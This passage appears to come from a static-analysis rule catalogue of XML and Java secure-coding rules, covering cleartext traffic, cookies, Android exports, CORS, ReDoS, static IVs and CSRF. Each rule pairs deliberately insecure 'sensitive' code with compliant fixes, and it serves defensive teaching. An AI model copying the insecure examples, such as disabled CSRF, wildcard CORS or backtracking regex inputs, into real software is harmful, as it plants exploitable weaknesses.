        http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="connectionFactoryLocator" class="org.springframework.social.connect.support.ConnectionFactoryRegistry">
      <property name="connectionFactories">
          <list>
              <bean class="org.springframework.social.twitter.connect.TwitterConnectionFactory">
                  <constructor-arg value="username" />
                  <constructor-arg value="very-secret-password" />   <!-- Sensitive -->
              </bean>
          </list>
      </property>
  </bean>
</beans>

Compliant Solution

In spring social twitter, retrieve secrets from environment variables:

@Configuration
public class SocialConfig implements SocialConfigurer {

    @Override
    public void addConnectionFactories(ConnectionFactoryConfigurer cfConfig, Environment env) {
        cfConfig.addConnectionFactory(new TwitterConnectionFactory(
            env.getProperty("twitter.consumerKey"),
            env.getProperty("twitter.consumerSecret")));  <!-- Compliant -->
    }
}

See

xml:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

<application
    android:usesCleartextTraffic="true"> <!-- Sensitive -->
</application>

For versions older than Android 9 (API level 28) android:usesCleartextTraffic is implicitely set to true.

<application> <!-- Sensitive -->
</application>

Compliant Solution

<application
    android:usesCleartextTraffic="false">
</application>

See

xml:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

<session-config>
 <cookie-config>
  <http-only>false</http-only> <!-- Sensitive -->
 </cookie-config>
</session-config>

<session-config>
 <cookie-config> <!-- Sensitive: http-only tag is missing defaulting to false -->
 </cookie-config>
</session-config>

Compliant Solution

<session-config>
 <cookie-config>
  <http-only>true</http-only> <!-- Compliant -->
 </cookie-config>
</session-config>

See

xml:S3374

Why is this an issue?

According to the Common Weakness Enumeration,

If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer’s expectations…​

In such a case, it is likely that the two forms should be combined. At the very least, one should be removed.

Noncompliant code example

<form-validation>
  <formset>
    <form name="BookForm"> ... </form>
    <form name="BookForm"> ... </form>  <!-- Noncompliant -->
  </formset>
</form-validation>

Compliant solution

<form-validation>
  <formset>
    <form name="BookForm"> ... </form>
  </formset>
</form-validation>

Resources

xml:S2647

Why is this an issue?

Basic authentication’s only means of obfuscation is Base64 encoding. Since Base64 encoding is easily recognized and reversed, it offers only the thinnest veil of protection to your users, and should not be used.

Noncompliant code example

// in web.xml
<web-app  ...>
  <!--  ...  -->
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>

Exceptions

The rule will not raise any issue if HTTPS is enabled, on any URL-pattern.

<web-app  ...>
  <!--  ...  -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HTTPS enabled</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <user-data-constraint>
      <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
</web-app>

Resources

xml:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production.

Activating a development feature in production can have an important range of consequences depending on its use:

  • Technical information leak; generally by disclosing verbose logging information to the application’s user.
  • Arbitrary code execution; generally with a parameter that will allow the remote debugging or profiling of the application.

In all cases, the attack surface of an affected application is increased. In some cases, such features can also make the exploitation of other unrelated vulnerabilities easier.

Ask Yourself Whether

  • The development of the app is completed and the development feature is activated.
  • The app is distributed to end users with the `development feature activated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Applications should be released without any development feature activated. When such features are required when in the development process of the application, they should only apply to a build variant that is dedicated to development environments. That variant should not be set as the default build configuration to prevent any unattended development feature exposition.

Sensitive Code Example

In AndroidManifest.xml the android debuggable property is set to true. The application will therefore be debuggable.

<application
  android:icon="@mipmap/ic_launcher"
  android:label="@string/app_name"
  android:roundIcon="@mipmap/ic_launcher_round"
  android:supportsRtl="true"
  android:debuggable="true"
  android:theme="@style/AppTheme">
</application>  <!-- Sensitive -->

In a web.config file, the customErrors element’s mode attribute is set to Off. The application will disclose unnecessarily verbose information to its users upon error.

<configuration>
  <system.web>
    <customErrors mode="Off" /> <!-- Sensitive -->
  </system.web>
</configuration>

Compliant Solution

In AndroidManifest.xml the android debuggable property is set to false:

<application
  android:icon="@mipmap/ic_launcher"
  android:label="@string/app_name"
  android:roundIcon="@mipmap/ic_launcher_round"
  android:supportsRtl="true"
  android:debuggable="false"
  android:theme="@style/AppTheme">
</application> <!-- Compliant -->

In a web.config file, the customErrors element’s mode attribute is set to On:

<configuration>
  <system.web>
    <customErrors mode="On" /> <!-- Compliant -->
  </system.web>
</configuration>

See

xml:S5594

Why is this an issue?

Once an Android component has been exported, it can be used by attackers to launch malicious actions and might also give access to other components that are not exported.

As a result, sensitive user data can be stolen, and components can be launched unexpectedly.

For this reason, the following components should be protected:

  • Providers
  • Activities
  • Activity-aliases
  • Services

To do so, it is recommended to either set exported to false, add android:readPermission and android:writePermission attributes, or add a <permission> tag.

Warning: When targeting Android versions lower than 12, the presence of intent filters will cause exported to be set to true by default.

If a component must be exported, use a <permission> tag and the protection level that matches your use case and data confidentiality requirements.
For example, Sync adapters should use a signature protection level to remain both exported and protected.

Noncompliant code example

The following components are vulnerable because permissions are undefined or partially defined:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:readPermission="com.example.app.READ_PERMISSION" />  <!-- Noncompliant: write permission is not defined -->
<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:writePermission="com.example.app.WRITE_PERMISSION" />  <!-- Noncompliant: read permission is not defined -->
<activity android:name="com.example.activity.Activity">  <!-- Noncompliant: permissions are not defined -->
  <intent-filter>
    <action android:name="com.example.OPEN_UI"/>
    <category android:name="android.intent.category.DEFAULT"/>
  </intent-filter>
</activity>

Compliant solution

If the component’s capabilities or data are not intended to be shared with other apps, its exported attribute should be set to false:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="false" />

Otherwise, implement permissions:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:readPermission="com.example.app.READ_PERMISSION"
  android:writePermission="com.example.app.WRITE_PERMISSION" />

<activity android:name="com.example.activity.Activity"
          android:permission="com.example.app.PERMISSION" >
  <intent-filter>
    <action android:name="com.example.OPEN_UI"/>
    <category android:name="android.intent.category.DEFAULT" />
  </intent-filter>
</activity>

Resources

xml:S6361

android:permission is used to set a single permission for both reading and writing data from a content provider. In regard to the Principle of Least Privilege, client applications that consume the content provider should only have the necessary privileges to complete their tasks. As android:permission grants both read and write access, it prevents client applications from applying this principle. In practice, it means client applications that require read-only access will have to ask for more privileges than what they need: the content provider will always grant read and write together.

Ask Yourself Whether

  • Some client applications consuming the content provider may only require read permission.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

  • Avoid using android:permission attribute alone. Instead android:readPermission and android:writePermission attributes to define separate read and write permissions.
  • Avoid using the same permission for android:readPermission and android:writePermission attributes.

Sensitive Code Example

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:permission="com.example.app.PERMISSION"  <!-- Sensitive -->
  android:exported="true"/>
<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:readPermission="com.example.app.PERMISSION"  <!-- Sensitive -->
  android:writePermission="com.example.app.PERMISSION" <!-- Sensitive -->
  android:exported="true"/>

Compliant Solution

<provider
  android:authorities="com.example.app.MyProvider"
  android:name="com.example.app.MyProvider"
  android:readPermission="com.example.app.READ_PERMISSION"
  android:writePermission="com.example.app.WRITE_PERMISSION"
  android:exported="true"/>

See

xml:S6359

Why is this an issue?

Defining a custom permission in the android.permission namespace may result in an unexpected permission assignment if a newer version of Android adds a permission with the same name. It is recommended to use a namespace specific to the application for custom permissions.

Noncompliant code example

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.organization.app">

    <permission
        android:name="android.permission.MYPERMISSION" /> <!-- Noncompliant -->

</manifest>

Compliant solution

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.organization.app">

    <permission
        android:name="com.organization.app.permission.MYPERMISSION" />

</manifest>

Resources

xml:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest Android will start the application if it is not already running once a matching broadcast is received. The receiver is an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

<receiver android:name=".MyBroadcastReceiver" android:exported="true">  <!-- Sensitive -->
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

Compliant Solution

Enforce permissions:

<receiver android:name=".MyBroadcastReceiver"
    android:permission="android.permission.SEND_SMS"
    android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

Do not export the receiver and only receive system intents:

<receiver android:name=".MyBroadcastReceiver" android:exported="false">
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

See

xml:S6358

Android has a built-in backup mechanism that can save and restore application data. When application backup is enabled, local data from your application can be exported to Google Cloud or to an external device via adb backup. Enabling Android backup exposes your application to disclosure of sensitive data. It can also lead to corruption of local data when restoration is performed from an untrusted source.

By default application backup is enabled and it includes:

Ask Yourself Whether

  • Application backup is enabled and sensitive data is stored in local files, local databases, or shared preferences.
  • Your application never validates data from files that are included in backups.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable application backup unless it is required for your application to work properly.
  • Narrow the scope of backed-up files by using either
    • backup rules (see android:fullBackupContent attribute).
    • a custom BackupAgent.
    • the dedicated no_backup folder (see android.content.Context#getNoBackupFilesDir()).
  • Do not back up local data containing sensitive information unless they are properly encrypted.
  • Make sure that the keys used to encrypt backup data are not included in the backup.
  • Validate data from backed-up files. They should be considered untrusted as they could have been restored from an untrusted source.

Sensitive Code Example

<application
    android:allowBackup="true"> <!-- Sensitive -->
</application>

Compliant Solution

Disable application backup.

<application
    android:allowBackup="false">
</application>

If targeting Android 6.0 or above (API level 23), define files to include/exclude from the application backup.

<application
    android:allowBackup="true"
    android:fullBackupContent="@xml/backup.xml">
</application>

See

xml:S5604

Permissions that can have a large impact on user privacy, marked as dangerous or "not for use by third-party applications" by Android, should be requested only if they are really necessary to implement critical features of an application.

Ask Yourself Whether

  • It is not sure that dangerous permissions requested by the application are really necessary.
  • The users are not clearly informed why and when dangerous permissions are requested by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to carefully review all the permissions and to use dangerous ones only if they are really necessary.

Sensitive Code Example

In AndroidManifest.xml:

<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <!-- Sensitive -->
<uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> <!-- Sensitive -->

Compliant Solution

<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <!-- Compliant -->

See

xml:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

<!-- Tomcat 7+ Cors Filter -->
<filter>
  <filter-name>CorsFilter</filter-name>
  <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
  <init-param>
    <param-name>cors.allowed.origins</param-name>
    <param-value>*</param-value> <!-- Sensitive -->
  </init-param>
</filter>

Compliant Solution

<!-- Tomcat 7+ Cors Filter -->
<filter>
  <filter-name>CorsFilter</filter-name>
  <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
  <init-param>
    <param-name>cors.allowed.origins</param-name>
    <param-value>https://trusted1.org,https://trusted2.org</param-value> <!-- Compliant -->
  </init-param>
</filter>

See

xml:S3281

Why is this an issue?

Default interceptors, such as application security interceptors, must be listed in the ejb-jar.xml file, or they will not be treated as default.

This rule applies to projects that contain JEE Beans (any one of javax.ejb.Singleton, MessageDriven, Stateless or Stateful).

Noncompliant code example

// file: ejb-interceptors.xml
<assembly-descriptor>
 <interceptor-binding> <!-- should be declared in ejb-jar.xml -->
      <ejb-name>*</ejb-name>
      <interceptor-class>com.myco.ImportantInterceptor</interceptor-class> <!-- Noncompliant; will NOT be treated as default -->
   </interceptor-binding>
</assembly-descriptor>

Compliant solution

// file: ejb-jar.xml
<assembly-descriptor>
 <interceptor-binding>
      <ejb-name>*</ejb-name>
      <interceptor-class>com.myco.ImportantInterceptor</interceptor-class>
   </interceptor-binding>
</assembly-descriptor>

Resources

java:S5852

Most of the regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input, in some cases it can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, this means that a small carefully-crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a large carefully-crafted input (thousands chars).

This rule determines the runtime complexity of a regular expression and informs you of the complexity if it is not linear.

Note that, due to improvements to the matching algorithm, some cases of exponential runtime complexity have become impossible when run using JDK 9 or later. In such cases, an issue will only be reported if the project’s target Java version is 8 or earlier.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen. Note that when performing a full match (e.g. using String.matches), the end of the regex counts as a pattern that can fail because it will only succeed when the end of the string is reached.

  • If you have a non-possessive repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
    • When using JDK 9 or later an optimization applies when the repetition is greedy and the entire regex does not contain any back references. In that case the runtime will only be polynomial (in case of nested repetitions) or even linear (in case of alternations or optional parts).
  • If you have multiple non-possessive repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If you’re performing a partial match (such as by using Matcher.find, String.split, String.replaceAll etc.) and the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition (even a possessive one), if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split("\\s*,") will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of way the inner group can be matched by the outer quantifier, for instance this nested quantifier situation (ba+)+ doesn’t cause performance issues, indeed, the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions with possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match. Especially when using partial matches, for which it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementations such as Google’s RE2 or RE2/J.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split("\\s*,\\s*") with str.split(",") and then trimming the spaces from the strings as a second step.
  • When using Matcher.find(), it is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to matcher.find() could be replaced with matcher.find() && matcher.group(1) != null.

Sensitive Code Example

The first regex evaluation will never end in JDK <= 9 and the second regex evaluation will never end in any versions of the JDK:

java.util.regex.Pattern.compile("(a+)+").matcher(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!").matches(); // Sensitive

java.util.regex.Pattern.compile("(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*").matcher(
"hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchi"+
"cchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihi"+
"chicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccch"+
"chhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihh"+
"ichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihih"+
"iihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci").matches(); // Sensitive

Compliant Solution

Possessive quantifiers do not keep backtracking positions, thus can be used, if possible, to avoid performance issues:

java.util.regex.Pattern.compile("(a+)++").matcher(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!").matches(); // Compliant

java.util.regex.Pattern.compile("(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*+").matcher(
"hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchi"+
"cchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihi"+
"chicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccch"+
"chhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihh"+
"ichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihih"+
"iihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci").matches(); // Compliant

See

java:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

Connection conn = DriverManager.getConnection("jdbc:derby:memory:myDB;create=true", "login", "");

Compliant solution

String password = System.getProperty("database.password");
Connection conn = DriverManager.getConnection("jdbc:derby:memory:myDB;create=true", "login", password);

Resources

java:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import java.nio.charset.StandardCharsets;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidKeyException;
import java.security.InvalidAlgorithmParameterException;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.NoSuchPaddingException;

public void encrypt(String key, String plainText) {

    byte[] RandomBytes = "7cVgr5cbdCZVw5WY".getBytes(StandardCharsets.UTF_8);

    GCMParameterSpec iv   = new GCMParameterSpec(128, RandomBytes);
    SecretKeySpec keySpec = new SecretKeySpec(key.getBytes(StandardCharsets.UTF_8), "AES");

    try {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv); // Noncompliant

    } catch(NoSuchAlgorithmException|InvalidKeyException|
            NoSuchPaddingException|InvalidAlgorithmParameterException e) {
        // ...
    }
}

Compliant solution

In this example, the code explicitly uses a number generator that is considered strong.

import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidKeyException;
import java.security.InvalidAlgorithmParameterException;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.NoSuchPaddingException;

public void encrypt(String key, String plainText) {

    SecureRandom random = new SecureRandom();
    byte[] randomBytes  = new byte[16];
    random.nextBytes(randomBytes);

    GCMParameterSpec iv   = new GCMParameterSpec(128, randomBytes);
    SecretKeySpec keySpec = new SecretKeySpec(key.getBytes(StandardCharsets.UTF_8), "AES");

    try {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv); // Noncompliant

    } catch(NoSuchAlgorithmException|InvalidKeyException|
            NoSuchPaddingException|InvalidAlgorithmParameterException e) {
        // ...
    }
}

How does this work?

Use unique IVs

To ensure strong security, the initialization vectors for each encryption operation must be unique and random but they do not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

java:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

Spring Security provides by default a protection against CSRF attacks which can be disabled:

@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

  @Override
  protected void configure(HttpSecurity http) throws Exception {
    http.csrf().disable(); // Sensitive: csrf protection is entirely disabled
   // or
    http.csrf().ignoringAntMatchers("/route/"); // Sensitive: csrf protection is disabled for specific routes
  }
}

Compliant Solution

Spring Security CSRF protection is enabled by default, do not disable it:

@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

  @Override
  protected void configure(HttpSecurity http) throws Exception {
    // http.csrf().disable(); // Compliant
  }
}

See

java:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

Throwable.printStackTrace(...) prints a Throwable and its stack trace to System.Err (by default) which is not easily parseable and can expose sensitive information:

try {
  /* ... */
} catch(Exception e) {
  e.printStackTrace(); // Sensitive
}

EnableWebSecurity annotation for SpringFramework with debug to true enables debugging support:

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;

@Configuration
@EnableWebSecurity(debug = true) // Sensitive
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
  // ...
}

WebView.setWebContentsDebuggingEnabled(true) for Android enables debugging support:

import android.webkit.WebView;

WebView.setWebContentsDebuggingEnabled(true); // Sensitive
WebView.getFactory().getStatics().setWebContentsDebuggingEnabled(true); // Sensitive

Compliant Solution

Loggers should be used (instead of printStackTrace) to print throwables:

try {
  /* ... */
} catch(Exception e) {
  LOGGER.log("context", e);
}

EnableWebSecurity annotation for SpringFramework with debug to false disables debugging support:

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;

@Configuration
@EnableWebSecurity(debug = false)
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
  // ...
}

WebView.setWebContentsDebuggingEnabled(false) for Android disables debugging support:

import android.webkit.WebView;

WebView.setWebContentsDebuggingEnabled(false);
WebView.getFactory().getStatics().setWebContentsDebuggingEnabled(false);

See

java:S4512

Setting JavaBean properties is security sensitive. Doing it with untrusted values has led in the past to the following vulnerability:

